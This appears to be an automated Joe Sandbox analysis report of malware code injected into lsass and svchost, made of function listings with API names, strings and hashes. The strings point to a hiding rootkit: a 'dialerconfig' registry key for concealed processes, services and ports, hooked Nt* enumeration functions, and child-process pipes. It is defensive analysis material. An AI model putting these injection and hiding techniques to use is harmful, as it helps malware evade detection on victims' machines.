                                                        • Source File: 0000001A.00000002.3152289425.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_26_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                        • String ID:
                                                        • API String ID: 3140674995-0
                                                        • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                        • Instruction ID: 43f65ee015122b04127526cc5c334c21e5a52d8fe7862f76cef395083f707644
                                                        • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                        • Instruction Fuzzy Hash: 74311972205B80CAFB609F60E8887ED6364F784744F45442BDB8E57A9AEF39C658C710
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001A.00000002.3152289425.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_26_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                        • String ID:
                                                        • API String ID: 1239891234-0
                                                        • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                        • Instruction ID: 3629953f5db9c1b5f8070e01c3cc1c8c2a667b2e639c3edd282c0df2f16cc2f9
                                                        • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                        • Instruction Fuzzy Hash: FF314F36214B80C6EB60CF25E88879E73A4F789758F550127EB9D47BA6EF38C559CB00

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001A.00000002.3152289425.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_26_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                        • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                        • API String ID: 106492572-2879589442
                                                        • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                        • Instruction ID: 1d03e476145ce09beb9e97f2b7c5aab0935724522098279c66d9844aa9511552
                                                        • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                        • Instruction Fuzzy Hash: F2710636210B50C6FB109F25E8DCA9D23A9FB84F88F425123DB9E47B6ADE39C458C744

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001A.00000002.3152289425.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_26_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                        • String ID: d
                                                        • API String ID: 2005889112-2564639436
                                                        • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                        • Instruction ID: a5c0dd0dd48098ab404cbb16107d584fe92d72ef17c22032ec6d5acc94b81fb7
                                                        • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                        • Instruction Fuzzy Hash: 2C513876200B84C6EB50CF62E48C35EB7A5F788F89F458126DB890776ADF39C059CB00

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001A.00000002.3152289425.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_26_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: CurrentThread$AddressHandleModuleProc
                                                        • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                        • API String ID: 4175298099-1975688563
                                                        • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                        • Instruction ID: 90a0736ddaf8fe37476ff4478ca91d660d6ffa8bbfea73cfc67e31501e438409
                                                        • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                        • Instruction Fuzzy Hash: 5031A2A5100B8AE0FE15EF69E8DD7DC2321F704748F835423D7A9021679F79866ED391

                                                        Control-flow Graph
                                                        • Graph image not reproduced in this extraction; entry block 202c0ab6910, calls __scrt_dllmain_crt_thread_attach, __scrt_dllmain_after_initialize_c and subroutines 202c0ab6fc0, 202c0ab6e54, 202c0ab6f04, 202c0ab7190, 202c0ab6f7c, 202c0ab6e1c, 202c0ab7318, 202c0ab7130, 202c0ab7154, 202c0ab6fac, 202c0ab268c, 202c0ab6ec4, 202c0ab72dc, 202c0ab6e0c, 202c0ab6e38, 202c0abac0c, 202c0ac5780, 202c0ab7180, 202c0ab7098, 202c0ababc8, 202c0ab6a78 (recursive call to 202c0ab6910)
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001A.00000002.3152046246.00000202C0AB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AB0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_26_2_202c0ab0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                        • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                        • API String ID: 190073905-1786718095
                                                        • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                        • Instruction ID: 14de66892ba18830acab2e245ab1e6cb8a15d62160b2822f01b591de40b948de
                                                        • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                        • Instruction Fuzzy Hash: 1381EE31600701CAFB50AB66A4CD39D66E8EB85780F57842BAB48977B7DF3DC88D8700

                                                        Control-flow Graph

                                                        APIs
                                                        • GetLastError.KERNEL32 ref: 00000202C0AECE37
                                                        • FlsGetValue.KERNEL32(?,?,?,00000202C0AF0A6B,?,?,?,00000202C0AF045C,?,?,?,00000202C0AEC84F), ref: 00000202C0AECE4C
                                                        • FlsSetValue.KERNEL32(?,?,?,00000202C0AF0A6B,?,?,?,00000202C0AF045C,?,?,?,00000202C0AEC84F), ref: 00000202C0AECE6D
                                                        • FlsSetValue.KERNEL32(?,?,?,00000202C0AF0A6B,?,?,?,00000202C0AF045C,?,?,?,00000202C0AEC84F), ref: 00000202C0AECE9A
                                                        • FlsSetValue.KERNEL32(?,?,?,00000202C0AF0A6B,?,?,?,00000202C0AF045C,?,?,?,00000202C0AEC84F), ref: 00000202C0AECEAB
                                                        • FlsSetValue.KERNEL32(?,?,?,00000202C0AF0A6B,?,?,?,00000202C0AF045C,?,?,?,00000202C0AEC84F), ref: 00000202C0AECEBC
                                                        • SetLastError.KERNEL32 ref: 00000202C0AECED7
                                                        • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000202C0AF0A6B,?,?,?,00000202C0AF045C,?,?,?,00000202C0AEC84F), ref: 00000202C0AECF0D
                                                        • FlsSetValue.KERNEL32(?,?,00000001,00000202C0AEECCC,?,?,?,?,00000202C0AEBF9F,?,?,?,?,?,00000202C0AE7AB0), ref: 00000202C0AECF2C
                                                          • Part of subcall function 00000202C0AED6CC: HeapAlloc.KERNEL32 ref: 00000202C0AED721
                                                        • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000202C0AF0A6B,?,?,?,00000202C0AF045C,?,?,?,00000202C0AEC84F), ref: 00000202C0AECF54
                                                          • Part of subcall function 00000202C0AED744: HeapFree.KERNEL32 ref: 00000202C0AED75A
                                                          • Part of subcall function 00000202C0AED744: GetLastError.KERNEL32 ref: 00000202C0AED764
                                                        • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000202C0AF0A6B,?,?,?,00000202C0AF045C,?,?,?,00000202C0AEC84F), ref: 00000202C0AECF65
                                                        • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000202C0AF0A6B,?,?,?,00000202C0AF045C,?,?,?,00000202C0AEC84F), ref: 00000202C0AECF76
                                                        Memory Dump Source
                                                        • Source File: 0000001A.00000002.3152289425.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_26_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: Value$ErrorLast$Heap$AllocFree
                                                        • String ID:
                                                        • API String ID: 570795689-0
                                                        • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                        • Instruction ID: 4882f9c6545ddba956175daa0b1033055c58a1b9921f799def37e079ec50fdf9
                                                        • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                        • Instruction Fuzzy Hash: 754197603013C4D6FE68A73555DD36D2242AB44BB4F174B27ABBB077E7EE38886A4600

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001A.00000002.3152289425.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_26_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                        • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                        • API String ID: 2171963597-1373409510
                                                        • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                        • Instruction ID: a0d3f3940cedbe8f49a02ff4fcf1ce97ef5dd93de91068aee362f87148ae0ba9
                                                        • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                        • Instruction Fuzzy Hash: 31213832614B40C2FB208B25E48C75E67A5F789BA4F514217EB9A03BA9CF3DC54DCB00
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001A.00000002.3152289425.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_26_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                        • String ID: csm$csm$csm
                                                        • API String ID: 849930591-393685449
                                                        • Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                        • Instruction ID: dc69ca82dc18b6d9c62c9d97f6a4348578a3add946f7b447ab90ca90604d3949
                                                        • Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                        • Instruction Fuzzy Hash: 12E16A72600B80CAFB60DB65948C39D77A4F7A6B98F120117EFA957B97CB34D4A9C700
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001A.00000002.3152046246.00000202C0AB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AB0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_26_2_202c0ab0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                        • String ID: csm$csm$csm
                                                        • API String ID: 849930591-393685449
                                                        • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                        • Instruction ID: 181cfaa8d1e203509729981359315e3b225e44fdda2c096569e0a7ba0a0bf46d
                                                        • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                        • Instruction Fuzzy Hash: E5E17A72604B80CAFB60DB69D48839D7BA4F755B98F12011BEF8957B9ACB34C499C704
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001A.00000002.3152289425.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_26_2_202c0ab0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: CurrentImageNonwritable__except_validate_context_record
                                                        • String ID: csm$f
                                                        • API String ID: 3242871069-629598281
                                                        • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                        • Instruction ID: 90803dd6b9b29f9c4154e969358d487dae67566bd5ce1f620f43925fcc542657
                                                        • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                        • Instruction Fuzzy Hash: 7F316A32201740D6FB299F29E88C75D7BA4F340B98F168117AF5A07786DB39C948C704
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001A.00000002.3152289425.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_26_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: FileWrite$ConsoleErrorLastOutput
                                                        • String ID:
                                                        • API String ID: 2718003287-0
                                                        • Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                        • Instruction ID: 5415e984cde6a1f954e745032577872c235aef40fdbcb0d3a10d64624b9653db
                                                        • Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                        • Instruction Fuzzy Hash: 99D1BC73B14B80C9F721CFA9D48829C3BA1F354B98F158217CF5A97B9ADA39C54AC740
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001A.00000002.3152289425.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_26_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$Free
                                                        • String ID:
                                                        • API String ID: 3168794593-0
                                                        • Opcode ID: fccdced75e0e166058a65fb9f01cb5bc762ae8e924348a52df6b038ca287fb4d
                                                        • Instruction ID: e1a4700da16e8d3ef1b17da53b22238d79ed5d8b917823312ea25b365b8a4f34
                                                        • Opcode Fuzzy Hash: fccdced75e0e166058a65fb9f01cb5bc762ae8e924348a52df6b038ca287fb4d
                                                        • Instruction Fuzzy Hash: 1E117977500B90C6F714DF62A88C14DB7A4F788F81F0A4127EB4903766DE39C0598744
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001A.00000002.3152289425.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_26_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: ConsoleErrorLastMode
                                                        • String ID:
                                                        • API String ID: 953036326-0
                                                        • Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                        • Instruction ID: 7750c07c3da3ab5777ee1fb19e88fe5ee8ba8c540cdc789170c23b37d6888931
                                                        • Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                        • Instruction Fuzzy Hash: D9918A73610B50C9FB61DF6594CC7AD2BA0B744B88F56410BDF4A67A96DB3AC88BC700
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001A.00000002.3152289425.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_26_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                        • String ID:
                                                        • API String ID: 2933794660-0
                                                        • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                        • Instruction ID: c1e121f40b66a15715f8d269b70c98ee374ca54bb48e74cdb6f3174d14493375
                                                        • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                        • Instruction Fuzzy Hash: 34111C22710B01C9FB00CB60E8983AC33A4F719B58F450E22DB6D467A5DB78C5988380
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001A.00000002.3152046246.00000202C0AB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AB0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_26_2_202c0ab0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: CallTranslator
                                                        • String ID: MOC$RCC
                                                        • API String ID: 3163161869-2084237596
                                                        • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                        • Instruction ID: f3028f0bacb26f4c6116040a1e45f79bacc9d5a175de68b6d573a429fff7c7f3
                                                        • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                        • Instruction Fuzzy Hash: B7614532A00B84CAFB24DF65D4883AD77A0F748B98F154217EF4917B9ADB38D599C704
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001A.00000002.3152289425.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_26_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: FileType
                                                        • String ID: \\.\pipe\
                                                        • API String ID: 3081899298-91387939
                                                        • Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                        • Instruction ID: 3514571e2c1d6cd3889b28a5e79674fb4b07f5075b2e224e86b20f94a4d05b12
                                                        • Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                        • Instruction Fuzzy Hash: 2B5180322087C1C1F6649B29A5DC3BEA791F385B80F560127DFEA03B9BDA39C52D8750
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001A.00000002.3152289425.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_26_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: ErrorFileLastWrite
                                                        • String ID: U
                                                        • API String ID: 442123175-4171548499
                                                        • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                        • Instruction ID: b84669cd5d919c91a09ffca97e8587df6a0950af1a2baa035680203c31bd1311
                                                        • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                        • Instruction Fuzzy Hash: 93418E63614B80C6EB209F25E8883AEA7A0F798794F524023EF4D87795EB39C44AC740
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001A.00000002.3152289425.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_26_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFileHeaderRaise
                                                        • String ID: csm
                                                        • API String ID: 2573137834-1018135373
                                                        • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                        • Instruction ID: 149d407967b934cd8ed689359ce0485475af0033eaf3f8f7976efa754672e473
                                                        • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                        • Instruction Fuzzy Hash: 8F112B36214B8082EB618B15E48835D77E5F788B94F594222EFCC077A9DF3DC569CB04
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001A.00000002.3152046246.00000202C0AB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AB0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_26_2_202c0ab0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: __std_exception_copy
                                                        • String ID: ierarchy Descriptor'$riptor at (
                                                        • API String ID: 592178966-758928094
                                                        • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                        • Instruction ID: 8da40ad284d153a9b89d1544e12ba7a913fe1935213764a8cba5128ad5ea2d85
                                                        • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                        • Instruction Fuzzy Hash: A1E08661641B44D0EF018F31E88829C33A4DB58B64F9A91239A5C06312FA38D1EDC300
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001A.00000002.3152046246.00000202C0AB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AB0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_26_2_202c0ab0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: __std_exception_copy
                                                        • String ID: Locator'$riptor at (
                                                        • API String ID: 592178966-4215709766
                                                        • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                        • Instruction ID: 5205816057d34bf06f4ea810c880042c8f0231ff55e9ce8539c58bb0b426eeb2
                                                        • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                        • Instruction Fuzzy Hash: 30E08661601F44C0EF058F31D88419C73A4E758B54F8A9123DA4C06312EA38D1E9C300
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001A.00000002.3152289425.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_26_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocFree
                                                        • String ID:
                                                        • API String ID: 756756679-0
                                                        • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                        • Instruction ID: 0bfdd2f4f70d0c77588d297d632a834cc4e271defd7936f82574c36193d19b8d
                                                        • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                        • Instruction Fuzzy Hash: 6C119A26601B94C1FA44CB66A88C22D63A0FBC8FC0F1A412BDF8D83766DF39C45AC300

                                                        Execution Graph

                                                        Execution Coverage: 0.7%
                                                        Dynamic/Decrypted Code Coverage: 0%
                                                        Signature Coverage: 0%
                                                        Total number of Nodes: 73
                                                        Total number of Limit Nodes: 2

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.3144342453.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_29_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                        • String ID:
                                                        • API String ID: 1683269324-0
                                                        • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                        • Instruction ID: 077229c1eed964279b07ec97370b47b92095969d86f76acc536d4c6ada0caa5e
                                                        • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                        • Instruction Fuzzy Hash: DC11AD70F246408BFB60EB61F98DB6923ECA746F46F8C41249907A3691EF7CC04C8283

                                                        Control-flow Graph

                                                        APIs
                                                          • Part of subcall function 000002A661301628: GetProcessHeap.KERNEL32 ref: 000002A661301633
                                                          • Part of subcall function 000002A661301628: HeapAlloc.KERNEL32 ref: 000002A661301642
                                                          • Part of subcall function 000002A661301628: RegOpenKeyExW.ADVAPI32 ref: 000002A6613016B2
                                                          • Part of subcall function 000002A661301628: RegOpenKeyExW.ADVAPI32 ref: 000002A6613016DF
                                                          • Part of subcall function 000002A661301628: RegCloseKey.ADVAPI32 ref: 000002A6613016F9
                                                          • Part of subcall function 000002A661301628: RegOpenKeyExW.ADVAPI32 ref: 000002A661301719
                                                          • Part of subcall function 000002A661301628: RegCloseKey.ADVAPI32 ref: 000002A661301734
                                                          • Part of subcall function 000002A661301628: RegOpenKeyExW.ADVAPI32 ref: 000002A661301754
                                                          • Part of subcall function 000002A661301628: RegCloseKey.ADVAPI32 ref: 000002A66130176F
                                                          • Part of subcall function 000002A661301628: RegOpenKeyExW.ADVAPI32 ref: 000002A66130178F
                                                          • Part of subcall function 000002A661301628: RegCloseKey.ADVAPI32 ref: 000002A6613017AA
                                                          • Part of subcall function 000002A661301628: RegOpenKeyExW.ADVAPI32 ref: 000002A6613017CA
                                                        • Sleep.KERNEL32 ref: 000002A661301AD7
                                                        • SleepEx.KERNELBASE ref: 000002A661301ADD
                                                          • Part of subcall function 000002A661301628: RegCloseKey.ADVAPI32 ref: 000002A6613017E5
                                                          • Part of subcall function 000002A661301628: RegOpenKeyExW.ADVAPI32 ref: 000002A661301805
                                                          • Part of subcall function 000002A661301628: RegCloseKey.ADVAPI32 ref: 000002A661301820
                                                          • Part of subcall function 000002A661301628: RegOpenKeyExW.ADVAPI32 ref: 000002A661301840
                                                          • Part of subcall function 000002A661301628: RegCloseKey.ADVAPI32 ref: 000002A66130185B
                                                          • Part of subcall function 000002A661301628: RegOpenKeyExW.ADVAPI32 ref: 000002A66130187B
                                                          • Part of subcall function 000002A661301628: RegCloseKey.ADVAPI32 ref: 000002A661301896
                                                          • Part of subcall function 000002A661301628: RegCloseKey.ADVAPI32 ref: 000002A6613018A0
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.3144342453.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_29_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CloseOpen$HeapSleep$AllocProcess
                                                        • String ID:
                                                        • API String ID: 1534210851-0
                                                        • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                        • Instruction ID: 99b07525fd2711d8e82b8b49fba128a9359a21ce05ef994d83d7f8484eb62716
                                                        • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                        • Instruction Fuzzy Hash: F3314171B00A4593FF509B26DA4D3A963FCAB46FCAF0C54219E0BA7295FF1CC459C292

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.3144342453.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_29_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: dialer
                                                        • API String ID: 0-3528709123
                                                        • Opcode ID: 65427932a6511f3c8dca5889eed1792e2f2e2d3e0b30565664b7cb78ea33e46c
                                                        • Instruction ID: 84d7da99e8808b0adfb76846f8b28e16625e6655772c6f218550ef611b4de524
                                                        • Opcode Fuzzy Hash: 65427932a6511f3c8dca5889eed1792e2f2e2d3e0b30565664b7cb78ea33e46c
                                                        • Instruction Fuzzy Hash: 59D0A760B512498BFF14DFE688CDA603798EB09F45F8C4034D90213150DF6C8A9D9711

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.3143881196.000002A6612D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A6612D0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
